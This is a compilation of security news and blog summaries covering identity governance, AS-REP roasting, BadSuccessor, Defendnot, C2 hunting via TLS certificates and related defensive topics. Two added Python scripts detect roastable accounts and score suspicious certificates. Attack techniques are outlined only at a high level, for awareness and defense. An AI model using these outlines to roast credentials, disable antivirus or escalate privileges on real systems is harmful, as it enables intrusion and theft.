1.1 Identity Governance in a Zero-Trust World

Source: Medium

Author: James Booth

URL: https://jmspbooth.medium.com/1-1-identity-governance-in-a-zero-trust-world-1ca5b58c4b8c

ONE SENTENCE SUMMARY: Identity governance operationalizes Zero Trust security by continuously managing user access, entitlements, and lifecycle events through automated, policy-driven controls.

MAIN POINTS:

  1. Most breaches occur due to unmanaged identities, orphaned accounts, and excess permissions.
  2. Zero Trust requires continuous verification of identity and entitlements in real-time.
  3. Identity governance ensures accurate user verification through robust identity proofing methods.
  4. Centralized directories with policy-as-code enforce consistent access controls across all systems.
  5. Decentralized identity (DIDs) enhances trust through cryptographically verified credentials.
  6. Automated lifecycle management rapidly revokes permissions when users change roles or leave.
  7. Non-human identities (bots, containers) require similar rigorous lifecycle governance controls.
  8. Conditional access dynamically evaluates real-time risk signals to adjust access levels immediately.
  9. Governance-as-code provides auditable, immutable records of entitlement changes and compliance.
  10. Effective identity governance significantly reduces breach probability and audit overhead costs.

TAKEAWAYS:

  1. Implement identity proofing and high-assurance authentication to enhance trust in user identities.
  2. Leverage centralized, policy-as-code IAM systems for consistent and secure access management.
  3. Adopt automated processes for join-move-leave events to mitigate risks from orphaned accounts.
  4. Include non-human identities in governance frameworks to address all possible security threats.
  5. Use decentralized identity and conditional access to build resilience against single points of failure.

msdirtbag/MDEAutomator: PowerShell-based Automation of Defender for Endpoint

Source: GitHub

Author: unknown

URL: https://github.com/msdirtbag/MDEAutomator

ONE SENTENCE SUMMARY:

MDEAutomator is a modular, serverless Azure Function and PowerShell-based solution streamlining endpoint management, incident response, threat hunting, and custom detection synchronization for Microsoft Defender for Endpoint (MDE).

MAIN POINTS:

  1. Provides bulk automation of response actions, live response commands, and threat indicator management.
  2. Utilizes Azure Functions (Dispatcher, Orchestrator, Profiles, TIManager, AutoHunt, CDManager) for endpoint orchestration.
  3. Supports multi-tenant operations using User Managed Identity and App Registration federation.
  4. Enables bulk threat hunting using KQL queries via Microsoft Graph API, exporting results to Azure Storage.
  5. Allows bulk synchronization of Custom Detections with Azure Storage, including backup capabilities.
  6. Offers convenient uploading/downloading of files and scripts to/from endpoints and Azure Storage.
  7. Implements Python/Flask-based GUI hosted in Azure App Service with Entra ID authentication.
  8. Provides cmdlets for essential operations such as device isolation, application execution restriction, and forensic package collection.
  9. Supports advanced security practices including signed PowerShell scripts via Azure Trusted Signing.
  10. Has an estimated monthly Azure cost of approximately $210 USD.

TAKEAWAYS:

  1. MDEAutomator significantly enhances Defender endpoint management through serverless automation and orchestration.
  2. Customizable PowerShell modules simplify complex MDE tasks like live response and threat indicator management.
  3. Multi-tenant readiness and federated identity options support scalable deployments.
  4. Advanced security measures like signed scripts and App Service authentication are strongly recommended.
  5. Comprehensive automation of custom detections and threat hunting greatly improves operational efficiency.

Kerberos AS-REP roasting attacks: What you need to know

Source: BleepingComputer

Author: Sponsored by Specops Software

URL: https://www.bleepingcomputer.com/news/security/kerberos-as-rep-roasting-attacks-what-you-need-to-know/

ONE SENTENCE SUMMARY: AS-REP Roasting attacks exploit Active Directory accounts without Kerberos pre-authentication, highlighting the critical importance of enforcing strong, secure passwords.

MAIN POINTS:

  1. AS-REP Roasting targets Active Directory user accounts lacking Kerberos pre-authentication.
  2. Normally, Kerberos pre-authentication requires the client to send a timestamp encrypted with a key derived from the user's password before the KDC will answer.
  3. When pre-authentication is disabled, anyone can request an AS-REP for the account; the reply contains data encrypted with the user's password-derived key.
  4. Attackers crack that encrypted portion of the AS-REP offline, typically by brute force or wordlist, to recover the password.
  5. Tools like Rubeus or Impacket facilitate AS-REP Roasting attacks.
  6. Cybersecurity agencies identify AS-REP Roasting among top Active Directory threats.
  7. Verizon reports stolen credentials involved in nearly half of data breaches.
  8. Organizations must identify vulnerable accounts using specialized detection scripts.
  9. Monitoring specific Windows Event IDs (4625, 4768, 4738, 5136) can detect ongoing attacks.
  10. Strong, uncompromised passwords and strict password policies significantly mitigate AS-REP Roasting risks.

TAKEAWAYS:

  1. Enforce Kerberos pre-authentication on Active Directory accounts to prevent AS-REP Roasting.
  2. Monitor and log key Windows security events to detect malicious activity promptly.
  3. Limit privileges and isolate accounts that must bypass Kerberos pre-authentication.
  4. Implement robust, compliant password policies to protect accounts against brute-force attacks.
  5. Regularly audit passwords against breached databases to maintain security and compliance.
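
Two checks a practitioner would script from the points above, as an added example that is not code from the article: finding the accounts that can be roasted (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl) and spotting roasting in the domain controller's Event ID 4768 records, where a successful TGT request with Pre-Authentication Type 0 is an AS-REP handed out without pre-authentication and RC4 (0x17) marks the cheap-to-crack case. The directory rows and events are constructed; the flag value and the 4768 field names are the real ones.

```python
"""Find Active Directory accounts that can be AS-REP roasted and spot roasting
in the KDC audit trail (Event ID 4768). Sample directory rows and events are
constructed; the flag value and event fields are the real ones."""
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: "Do not require Kerberos preauthentication"
RC4_HMAC = "0x17"             # TicketEncryptionType that makes the AS-REP cheap to crack


def accounts_without_preauth(rows):
    """rows: dicts with sAMAccountName and userAccountControl, e.g. exported
    with Get-ADUser -Filter * -Properties userAccountControl."""
    return sorted(r["sAMAccountName"] for r in rows
                  if int(r["userAccountControl"]) & DONT_REQ_PREAUTH)


def roast_indicators(events):
    """events: 4768 records. A successful TGT request with PreAuthType 0 is an
    AS-REP issued without pre-authentication; several such requests for
    different accounts from one address is a roasting sweep."""
    hits = [e for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == 0 and e["ServiceName"].lower() == "krbtgt"]
    by_ip = defaultdict(set)
    for e in hits:
        by_ip[e["IpAddress"]].add(e["TargetUserName"])
    return {
        "asrep_without_preauth": [
            {"user": e["TargetUserName"], "ip": e["IpAddress"],
             "crackable_rc4": e["TicketEncryptionType"] == RC4_HMAC} for e in hits],
        "sweep_sources": {ip: sorted(users) for ip, users in by_ip.items() if len(users) >= 2},
    }


# Constructed directory export: 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x410200},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x400200},
]

# Constructed 4768 events: a sweep from 10.0.0.55, a normal AES logon, and the
# routine "pre-auth required" bounce (0x19) that a real client gets first.
SAMPLE_4768 = [
    {"TargetUserName": "svc_backup", "ServiceName": "krbtgt", "IpAddress": "::ffff:10.0.0.55",
     "TicketEncryptionType": "0x17", "PreAuthType": 0, "Status": "0x0"},
    {"TargetUserName": "legacy_app", "ServiceName": "krbtgt", "IpAddress": "::ffff:10.0.0.55",
     "TicketEncryptionType": "0x17", "PreAuthType": 0, "Status": "0x0"},
    {"TargetUserName": "alice", "ServiceName": "krbtgt", "IpAddress": "::ffff:10.0.0.23",
     "TicketEncryptionType": "0x12", "PreAuthType": 2, "Status": "0x0"},
    {"TargetUserName": "alice", "ServiceName": "krbtgt", "IpAddress": "::ffff:10.0.0.23",
     "TicketEncryptionType": "0x12", "PreAuthType": 0, "Status": "0x19"},
]

if __name__ == "__main__":
    print("roastable:", accounts_without_preauth(SAMPLE_USERS))
    print(roast_indicators(SAMPLE_4768))
```

Every account the first function returns should be fixed with Set-ADAccountControl -DoesNotRequirePreAuth $false unless a documented application needs the exception; for the exceptions, a long random password and AES-only encryption types turn a seconds-long crack into an impractical one, and the second function tells you which hosts are trying.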

Rapid7 Q1 2025 Incident Response Findings

Source: Rapid7 Cybersecurity Blog

Author: Chris Boyd

URL: https://www.rapid7.com/blog/post/2025/06/04/rapid7-q1-2025-incident-response-findings/

ONE SENTENCE SUMMARY:

Rapid7’s Q1 2025 report highlights stolen credentials without MFA as the top initial access vector, widespread BunnyLoader malware, and targeted ransomware attacks primarily affecting manufacturing.

MAIN POINTS:

  1. Stolen credentials without MFA remain the leading initial access vector, causing 56% of incidents.
  2. Exposed RDP services were the initial access vector in 6% but exploited further in 44% of incidents.
  3. Vulnerability CVE-2024-55591 in Fortinet appliances widely exploited, enabling attacker control and data exfiltration.
  4. Exploited SimpleHelp RMM vulnerabilities (CVE-2024-57726/57727/57728) facilitated ransomware deployment.
  5. SEO poisoning via sponsored search ads led directly to malware downloads and ransomware attacks.
  6. BunnyLoader malware observed in 40% of incidents, prevalent across nearly all industries.
  7. Fake CAPTCHA attacks accounted for half of BunnyLoader malware deployments.
  8. Manufacturing was the most targeted industry, involved in over 24% of incidents.
  9. Qilin ransomware group actively targeted healthcare, manufacturing, financial sectors through double-extortion attacks.
  10. Attackers frequently disabled security tools and backups to prevent recovery post-compromise.

TAKEAWAYS:

  1. Implementing MFA remains critical, as attackers consistently exploit unprotected valid credentials.
  2. Organizations must secure exposed RDP and RMM tooling to prevent ransomware infections.
  3. Be cautious of sponsored search results to avoid SEO poisoning and malware downloads.
  4. Strengthen defenses against BunnyLoader malware, particularly fake CAPTCHA and compromised sites.
  5. Manufacturing organizations should prioritize securing legacy systems and complex supply chains.

The Role of Telemetry in Cloud Security: Unlocking the Secrets of the Cloud 

Source: Varonis Blog

Author: Daniel Miller

URL: https://www.varonis.com/blog/cloud-telemetry

ONE SENTENCE SUMMARY:

Telemetry enables proactive cloud security by analyzing real-time data to detect anomalies, strengthen defenses, and respond swiftly to threats.

MAIN POINTS:

  1. Telemetry collects real-time data to monitor cloud environments and detect security threats proactively.
  2. AWS CloudTrail logs API calls, aiding in auditing, compliance, and detecting unauthorized access.
  3. Azure Monitor analyzes telemetry data, integrating with Azure Security Center (now Microsoft Defender for Cloud) for enhanced threat detection.
  4. Google Cloud Audit Logs track resource actions to detect suspicious activities and ensure policy compliance.
  5. Telemetry helps identify unusual patterns, like spikes in API calls signaling potential breaches.
  6. Detailed telemetry records support auditing and demonstrate compliance with regulatory requirements.
  7. Continuous telemetry monitoring improves security posture by addressing vulnerabilities in real-time.
  8. Automation of telemetry monitoring ensures prompt detection and response to threats.
  9. Integrating telemetry data with SIEM enhances comprehensive threat detection and security visibility.
  10. Challenges like data volume, quality, and integration complexity require effective data management strategies.

TAKEAWAYS:

  1. Utilize cloud provider tools (AWS CloudTrail, Azure Monitor, Google Cloud Audit Logs) for robust telemetry.
  2. Continuously monitor telemetry data to proactively detect and respond to threats.
  3. Integrate telemetry solutions with SIEM systems for comprehensive security insights.
  4. Automate telemetry monitoring processes to improve efficiency and threat response speed.
  5. Address telemetry challenges with efficient data management, validation, and standardized integration practices.

Threat Hunting C2 over HTTPS Connections Using the TLS Certificate

Source: Active Countermeasures

Author: Faan Rossouw

URL: https://www.activecountermeasures.com/threat-hunting-c2-over-https-connections-using-the-tls-certificate/

ONE SENTENCE SUMMARY: The article discusses techniques for threat hunting command and control (C2) activity hidden within HTTPS connections using TLS certificates.

MAIN POINTS:

  1. Threat actors often hide C2 traffic within encrypted HTTPS connections.
  2. TLS certificates can provide valuable indicators for detecting malicious activities.
  3. Legitimate certificates are sometimes misused by attackers for C2 communications.
  4. Anomalies in TLS certificate metadata help identify suspicious HTTPS connections.
  5. Certificate attributes like issuer, validity period, and domain can indicate malicious usage.
  6. Automated tools can analyze TLS certificates efficiently to detect threats.
  7. Inspecting certificates is essential for effective threat hunting practices.
  8. TLS certificate fingerprinting helps identify known malicious infrastructure.
  9. Monitoring certificate issuance patterns can uncover malicious actors’ infrastructure.
  10. Properly implemented TLS certificate inspection enhances cybersecurity posture.

TAKEAWAYS:

  1. Leverage TLS certificate metadata analysis to detect hidden C2 channels.
  2. Pay attention to unusual certificate attributes to identify potential threats.
  3. Integrate certificate inspection into existing threat hunting methodologies.
  4. Automate TLS certificate monitoring to efficiently spot anomalies.
  5. Maintain updated threat intelligence on TLS certificate misuse for effective detection.
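
The certificate attributes listed above turned into a scoring hunt, as an added example that is not code from the Active Countermeasures post. It assumes per-connection certificate metadata of the kind Zeek's ssl.log and x509.log provide (subject, issuer, validity dates, SAN names, the SNI the client asked for, and a fingerprint); the three records, the indicator weights and the "known bad" fingerprint set are constructed. Self-signed certificates, OpenSSL's default placeholder subject, an SNI that the certificate does not cover, a certificate issued days ago, and a fingerprint on a threat-intelligence list each add to a score, and connections above a threshold are ranked for review.

```python
"""Score TLS certificate metadata (fields as Zeek's ssl.log/x509.log expose
them) for the traits that separate C2 listeners from ordinary servers. The
records and the "known bad" fingerprint are constructed."""
import re
from datetime import datetime, timedelta

KNOWN_BAD_SHA1 = {"0123456789abcdef0123456789abcdef01234567"}   # constructed stand-in for a threat-intel list
PLACEHOLDER_SUBJECTS = ("Internet Widgits Pty Ltd", "Some-State", "CN=localhost", "Default Company Ltd")


def _cn(dn):
    m = re.search(r"CN=([^,]+)", dn or "")
    return m.group(1).strip() if m else None


def _name_matches(host, name):
    """Exact or single-label wildcard match, as TLS clients do it."""
    if name.startswith("*."):
        return host.count(".") == name.count(".") and host.endswith(name[1:])
    return host == name


def score_certificate(rec, now):
    """Return (score, reasons) for one observed certificate."""
    score, reasons = 0, []
    issued = datetime.fromisoformat(rec["not_valid_before"])
    expires = datetime.fromisoformat(rec["not_valid_after"])
    names = set(rec.get("san_dns", []))
    if _cn(rec["subject"]):
        names.add(_cn(rec["subject"]))

    if rec["subject"] == rec["issuer"]:
        score += 3
        reasons.append("self-signed")
    if any(p in rec["subject"] for p in PLACEHOLDER_SUBJECTS):
        score += 3
        reasons.append("placeholder-subject")
    if rec.get("server_name") and not any(_name_matches(rec["server_name"], n) for n in names):
        score += 3
        reasons.append("sni-not-in-certificate")
    if not rec.get("san_dns"):
        score += 1
        reasons.append("no-san")
    if now - issued < timedelta(days=7):
        score += 1
        reasons.append("issued-this-week")
    if expires - issued > timedelta(days=825):
        score += 1
        reasons.append("overlong-validity")
    if rec.get("sha1") in KNOWN_BAD_SHA1:
        score += 5
        reasons.append("known-bad-fingerprint")
    return score, reasons


def hunt(records, now, threshold=4):
    """Rank connections whose certificate scores at or above threshold."""
    ranked = []
    for rec in records:
        score, reasons = score_certificate(rec, now)
        if score >= threshold:
            ranked.append({"server_name": rec.get("server_name"), "score": score, "reasons": reasons})
    return sorted(ranked, key=lambda h: h["score"], reverse=True)


# Constructed observations: a normal CA-issued site, a fresh self-signed
# certificate with OpenSSL defaults on an SNI it does not name, and a
# well-formed certificate whose fingerprint is on the intel list.
NOW = datetime(2025, 6, 10)
SAMPLE = [
    {"server_name": "www.example.com", "subject": "CN=www.example.com,O=Example Inc,C=US",
     "issuer": "CN=Example Trust CA,O=Example Trust,C=US", "san_dns": ["www.example.com", "example.com"],
     "not_valid_before": "2025-01-10", "not_valid_after": "2026-01-10", "sha1": "a" * 40},
    {"server_name": "cdn-update.example.net", "subject": "C=AU,ST=Some-State,O=Internet Widgits Pty Ltd",
     "issuer": "C=AU,ST=Some-State,O=Internet Widgits Pty Ltd", "san_dns": [],
     "not_valid_before": "2025-06-08", "not_valid_after": "2026-06-08", "sha1": "b" * 40},
    {"server_name": "mail.example.org", "subject": "CN=mail.example.org",
     "issuer": "CN=Example Trust CA,O=Example Trust,C=US", "san_dns": ["mail.example.org"],
     "not_valid_before": "2020-03-01", "not_valid_after": "2031-03-01",
     "sha1": "0123456789abcdef0123456789abcdef01234567"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE, NOW):
        print(hit)
```

The third record is the reason fingerprint matching sits beside the heuristics: a C2 behind a perfectly ordinary CA-issued certificate scores nothing on the metadata checks and is caught only because its hash is already known, which is what keeping the intel list current buys you.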

You Don’t Need a Red Team

Source: Dark Reading

Author: unknown

URL: https://www.darkreading.com/cyber-risk/you-dont-need-red-team

ONE SENTENCE SUMMARY: Attack path mapping, a collaborative and cost-effective offensive security methodology, offers broader coverage and better educates teams compared to traditional red-team exercises.

MAIN POINTS:

  1. Most red-team exercise requests are redirected due to client readiness, budget, or understanding issues.
  2. Attack path mapping involves collaboration between offensive operators and internal security SMEs.
  3. Traditional red-team tests identify only the simplest paths rather than providing comprehensive coverage.
  4. Attack path mapping starts by defining critical business objectives and potential attacker entry points.
  5. Working transparently with internal experts accelerates reconnaissance and better maps attack paths.
  6. Cloud-native environments demand collaborative testing due to advanced identity management protections.
  7. Realistic scenarios such as compromised DevOps roles offer better insights into actual security risks.
  8. Purple teams, while beneficial, often sacrifice realism by overly focusing on endpoint security tests.
  9. Automated purple team exercises effectively assess detection capabilities but overlook deeper threats.
  10. The suggested collaborative methodology provides more comprehensive insights and better overall value.

TAKEAWAYS:

  1. Collaborative methodologies provide broader security coverage than traditional stealth-based red teams.
  2. Engaging internal experts significantly accelerates offensive security assessments and enriches outcomes.
  3. Realistic attacker scenarios better address genuine security threats than standard isolated test cases.
  4. Cloud security assessments benefit significantly from granting testers higher visibility and realistic privileges.
  5. Carefully evaluate whether a traditional red-team exercise truly meets your organization’s security needs.

The hidden gaps in your asset inventory, and how to close them

Source: Help Net Security

Author: Mirko Zorz

URL: https://www.helpnetsecurity.com/2025/05/22/tim-grieveson-thingsrecon-asset-inventory-gaps/

ONE SENTENCE SUMMARY: Tim Grieveson emphasizes ongoing automated asset discovery, cross-functional collaboration, addressing overlooked blind spots, and context-driven risk prioritization.

MAIN POINTS:

  1. Asset inventory should be ongoing, automated, and integrated with business context, not a one-time project.
  2. Communicating inventory issues openly with stakeholders is crucial for managing associated risks.
  3. Leveraging existing endpoint agents, cloud providers, DNS records, and procurement systems enhances initial visibility.
  4. Implementing dedicated continuous discovery tools significantly improves security visibility and asset context.
  5. Clearly defining inventory scope and categorizing assets prevents critical elements from being overlooked.
  6. Asset inventory requires collaboration across security, IT operations, development, network, and business teams.
  7. The biggest blind spot is relying solely on documentation without validating the assets actually live on the network.
  8. Commonly overlooked assets include subdomains, public APIs, third-party integrations, and misconfigured DNS services.
  9. Asset discovery must integrate closely with vulnerability management, threat detection, and CMDB systems.
  10. Contextual information (exposure, business-criticality, usage) is essential for accurate asset risk prioritization.

TAKEAWAYS:

  1. Shift asset inventory mindset from periodic audits to continuous, automated discovery.
  2. Build cross-functional teams to maintain comprehensive asset visibility across organizational silos.
  3. Regularly validate documented assets against actual infrastructure to prevent blind spots.
  4. Expand discovery to external, third-party, and edge assets beyond traditional network boundaries.
  5. Prioritize risk based on asset exposure, criticality, and business context rather than just severity scores.

The Hidden Cybersecurity Risks of M&A

Source: Dark Reading

Author: Denny LeCompte

URL: https://www.darkreading.com/cyber-risk/hidden-cybersecurity-risks-mergers-acquisitions

ONE SENTENCE SUMMARY: Ignoring cybersecurity during mergers and acquisitions exposes businesses to hidden vulnerabilities, compliance issues, and costly security breaches post-acquisition.

MAIN POINTS:

  1. Mergers involve inheriting digital footprints including endpoints, credentials, and hidden security vulnerabilities.
  2. Cybersecurity is frequently neglected in due diligence, creating substantial risk post-acquisition.
  3. IT integration chaos often leads to insufficient access control and outdated credential management.
  4. Legacy systems from acquired companies pose significant cybersecurity threats if not assessed.
  5. Employees are vulnerable to phishing scams during transitions, increasing insider threat risks.
  6. Inadequate cybersecurity training can result in sensitive data leaks and breaches post-merger.
  7. Regulatory and compliance mismatches between companies can create serious legal and financial liabilities.
  8. Comprehensive cybersecurity audits must evaluate identities, compliance histories, and past breaches.
  9. Companies should promptly standardize security policies and adopt modern, cloud-native security solutions.
  10. Proactive cybersecurity integration during mergers is essential to protect reputation, trust, and financial value.

TAKEAWAYS:

  1. Prioritize cybersecurity due diligence alongside financial and operational assessments.
  2. Enforce strict access control policies and revoke outdated credentials immediately post-acquisition.
  3. Conduct thorough audits of legacy IT systems and address incompatibilities proactively.
  4. Implement cybersecurity awareness and anti-phishing training programs early in the merger process.
  5. Align quickly with the strictest compliance standards from both companies to mitigate regulatory risks.

BadSuccessor: Unpatched Microsoft Active Directory attack enables domain takeover

Source: CSO Online

Author: unknown

URL: https://www.csoonline.com/article/3992456/badsuccessor-unpatched-microsoft-active-directory-attack-enables-domain-takeover.html

ONE SENTENCE SUMMARY: Researchers discovered a critical vulnerability named “BadSuccessor” in Windows Server 2025 Active Directory allowing attackers full domain compromise without needing privileged accounts.

MAIN POINTS:

  1. Researchers identified “BadSuccessor,” a new vulnerability in Windows Server 2025 Active Directory.
  2. The flaw exploits Delegated Managed Service Accounts (dMSA), intended to mitigate Kerberoasting attacks.
  3. Attackers can impersonate any user, including domain administrators, through manipulated dMSA account attributes.
  4. Microsoft rated the issue moderately severe, not immediately urgent, despite researchers’ strong disagreement.
  5. dMSA accounts inherit permissions of superseded service accounts through migration processes lacking proper validation.
  6. Key Distribution Center (KDC) mistakenly grants privileges based solely on easily manipulated account attributes.
  7. Attackers can exploit CreateChild permissions on Organizational Units (OUs) to create malicious dMSA accounts.
  8. Unprivileged users can arbitrarily set attributes to falsely indicate completed migrations, gaining unauthorized privileges.
  9. Attackers can extract encrypted passwords included in the KERB-DMSA-KEYPACKAGE structure of session tickets.
  10. Akamai released a PowerShell script and monitoring guidelines for organizations until Microsoft provides an official patch.

TAKEAWAYS:

  1. Immediately restrict CreateChild permissions to trusted administrators.
  2. Use Akamai’s provided PowerShell script to audit current AD environments for vulnerable permissions.
  3. Implement recommended SACLs to log suspicious dMSA creations and attribute modifications.
  4. Regularly monitor for unusual TGTs containing KERB-DMSA-KEYPACKAGE structures.
  5. Advocate for urgent internal review of AD permissions despite Microsoft’s moderate severity rating.

Getting started with Conditional Access: Comparing Entra ID Conditional Access with Cisco Duo Security

Source: The Red Canary Blog: Information Security Insights

Author: Sam Straka

URL: https://redcanary.com/blog/security-operations/conditional-access-cisco-duo/

ONE SENTENCE SUMMARY: This blog compares Microsoft’s Entra ID Conditional Access and Cisco’s Duo Adaptive Access Policies, highlighting their similarities, differences, and integration possibilities.

MAIN POINTS:

  1. Duo primarily provides MFA layered over existing identity solutions, unlike full IAM platforms such as Microsoft Entra ID.
  2. Duo policies can be globally applied or targeted per application/user group, similar to Entra ID.
  3. Duo enforces MFA by default, with conditional bypass options for trusted scenarios.
  4. Device compliance checks in Duo use certificates or health apps, comparable to Entra ID’s Intune integration.
  5. Duo’s user interface for granular device policy rules is user-friendly and intuitive.
  6. Duo offers geolocation and trusted network conditions similar to Entra ID’s named locations.
  7. Duo introduced Risk-Based Authentication (RBA) in 2023, focusing on anomalies during MFA steps.
  8. Duo doesn’t directly block legacy authentication, relying instead on primary authentication systems.
  9. Duo excels at enforcing device health and compliance checks for sensitive resource access.
  10. Duo integrates as a third-party MFA provider with Entra ID Conditional Access via custom controls.

TAKEAWAYS:

  1. Duo is ideal for organizations looking primarily for strong MFA and device health checks.
  2. Microsoft Entra ID offers deeper integration with device management and broader risk evaluation signals.
  3. Duo’s RBA effectively addresses MFA fatigue and anomalous sign-in behaviors.
  4. Combining Duo with Entra ID provides comprehensive conditional access coverage but introduces complexity.
  5. Advanced conditional access features in both solutions require higher-tier licensing plans.

AWS Default IAM Roles Found to Enable Lateral Movement and Cross-Service Exploitation

Source: The Hacker News

Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/05/aws-default-iam-roles-found-to-enable.html

ONE SENTENCE SUMMARY: Researchers discovered insecure default IAM roles in AWS services enabling attackers to escalate privileges and compromise entire AWS accounts.

MAIN POINTS:

  1. Default IAM roles in AWS services grant overly broad permissions, enabling privilege escalation.
  2. Vulnerable IAM roles were found in AWS services such as SageMaker, Glue, EMR, and Lightsail.
  3. Similar issues were identified in the open-source framework Ray, which uses the AmazonS3FullAccess policy.
  4. Attackers exploit default IAM roles to move laterally across AWS services.
  5. IAM roles with AmazonS3FullAccess provide complete read/write access to all S3 buckets.
  6. Attackers can modify AWS assets such as CloudFormation templates and SageMaker resources.
  7. Malicious machine learning models uploaded to Hugging Face can execute arbitrary code on SageMaker.
  8. AWS addressed vulnerabilities by restricting AmazonS3FullAccess policy for default roles.
  9. Researchers advise organizations to audit and tightly scope default IAM role permissions.
  10. A similar privilege escalation vulnerability was found in the Azure Storage mounting utility AZNFS-mount.

TAKEAWAYS:

  1. Default IAM roles must be strictly limited to required resources and actions.
  2. Organizations should proactively audit default IAM role permissions to minimize risk.
  3. Permissive IAM roles can break isolation boundaries between cloud services.
  4. Attackers leverage broad IAM permissions for lateral movement and privilege escalation.
  5. Cloud providers regularly patch vulnerabilities; organizations must promptly apply security updates.

Why Probability Theory is Hard. It’s not because you’re stupid or…

Source: Medium

Author: Graeme Keith

URL: https://www.cantorsparadise.com/why-probability-theory-is-hard-af838f053882

ONE SENTENCE SUMMARY: Probability theory is fundamentally challenging due to its non-intuitive nature, conceptual confusion, and reliance on deliberate, slow cognitive processing.

MAIN POINTS:

  1. Probability theory resists intuitive understanding, unlike mechanical systems we learn naturally through repetition.
  2. Humans struggle to develop reliable intuition for uncertain systems because outcomes are inconsistent.
  3. Kahneman’s “Thinking, Fast and Slow” emphasizes probability’s reliance on slow, deliberate System 2 thinking.
  4. Even experienced mathematicians rarely develop instinctive probabilistic intuitions, despite extensive practice.
  5. Probability theorists disagree fundamentally on definitions, causing confusion for learners.
  6. Practical probability problems often involve unclear outcome spaces, complicating conceptual clarity.
  7. Probability education frequently resorts to rote memorization due to conceptual complexity.
  8. Notation in probability theory is often confusing, complicating student comprehension.
  9. Despite complexity, basic probability knowledge significantly improves decision-making under uncertainty.
  10. Minimal probabilistic understanding is vastly superior to purely intuitive or guess-based approaches.

TAKEAWAYS:

  1. Accept that probability is inherently difficult, not due to personal inadequacy.
  2. Focus on developing methodical, slow-thinking approaches to probability problems.
  3. Be patient and kind with yourself when struggling with probabilistic concepts.
  4. Prioritize basic probabilistic literacy to substantially enhance practical decision-making.
  5. Understand that conceptual disagreements within probability theory contribute to its learning difficulty.

New ‘Defendnot’ tool tricks Windows into disabling Microsoft Defender

Source: BleepingComputer

Author: Lawrence Abrams

URL: https://www.bleepingcomputer.com/news/microsoft/new-defendnot-tool-tricks-windows-into-disabling-microsoft-defender/

ONE SENTENCE SUMMARY: The Defendnot tool exploits an undocumented Windows API to disable Microsoft Defender by registering a fake antivirus product.

MAIN POINTS:

  1. Defendnot disables Microsoft Defender by registering a fake antivirus using Windows Security Center API.
  2. Windows disables Defender automatically when another antivirus registers to prevent security conflicts.
  3. Researcher es3n1n developed Defendnot based on an earlier project called no-defender.
  4. The earlier no-defender tool was removed from GitHub due to a DMCA copyright claim.
  5. Defendnot avoids legal issues by using a self-built dummy antivirus DLL rather than third-party code.
  6. Protected Process Light (PPL) and digital signatures normally safeguard the WSC API.
  7. Defendnot bypasses security by injecting its DLL into the trusted Microsoft-signed Taskmgr.exe process.
  8. The tool supports configuration via a ctx.bin file, custom antivirus names, and verbose logging.
  9. Defendnot achieves persistence by creating an autorun entry in Windows Task Scheduler.
  10. Microsoft Defender identifies and quarantines Defendnot as ‘Win32/Sabsik.FL.!ml’.

TAKEAWAYS:

  1. Windows Security Center API can be manipulated to disable built-in security defenses.
  2. Trusted processes like Task Manager can be exploited to bypass Windows security protections.
  3. Persistence mechanisms via Task Scheduler highlight the importance of monitoring scheduled tasks.
  4. Microsoft Defender actively detects and blocks Defendnot, signaling ongoing defender capabilities.
  5. Security teams should be aware of undocumented APIs and regularly audit registered antivirus products.

73% of CISOs admit security incidents due to unknown or unmanaged assets

Source: CSO Online

Author: unknown

URL: https://www.csoonline.com/article/3980431/more-assets-more-attack-surface-more-risk.html

Key Takeaways:

  1. Lack of Asset Visibility and Accurate Management
    Almost three-quarters (73%) of cybersecurity leaders experienced incidents directly linked to unidentified or improperly managed IT assets. Without full visibility into their digital environments, organizations struggle to fully grasp the extent and nature of their potential vulnerabilities, significantly weakening their cybersecurity.

  2. Recognition of Impact on Business Risk
    Approximately 9 out of 10 executives recognize the critical importance of effectively managing the digital attack surface as it directly affects business risk. Security issues stemming from mismanaged or unknown IT assets can have serious consequences, including interruptions in business continuity (42%), harm to customer trust and brand reputation (39%), diminished competitiveness (39%), weakened supplier relationships (39%), and negative impacts on employee productivity and financial performance (38% each).

  3. Inadequate Adoption of Proactive Risk Management
    Despite clear recognition of the threat and the potential negative impacts on business operations, only 43% of companies actively use specialized tools for proactive attack surface management. A large majority (58%) stated they lack continuous monitoring processes—even though such proactive security management tools and monitoring are essential for promptly mitigating and containing cybersecurity risks.

  4. Urgent Call to Action
    The survey highlights an increasing urgency for improving cybersecurity posture. Many enterprises remain behind the curve, reluctant or slow in adopting robust security strategies, tools, and ongoing monitoring processes needed to contain their rapidly expanding cyber risks. Cyber risk management must be prioritized at the highest levels to safeguard enterprises effectively.

In conclusion, the Trend Micro survey points to a common cybersecurity challenge: while businesses are aware of the problem and its serious consequences, actual implementation to proactively manage and reduce the attack surface remains limited and inadequate. Chief security officers and business leaders must urgently prioritize comprehensive visibility, proper asset inventory management, continuous risk monitoring, and proactive management to minimize cybersecurity incidents and shield their organization from severe business disruptions.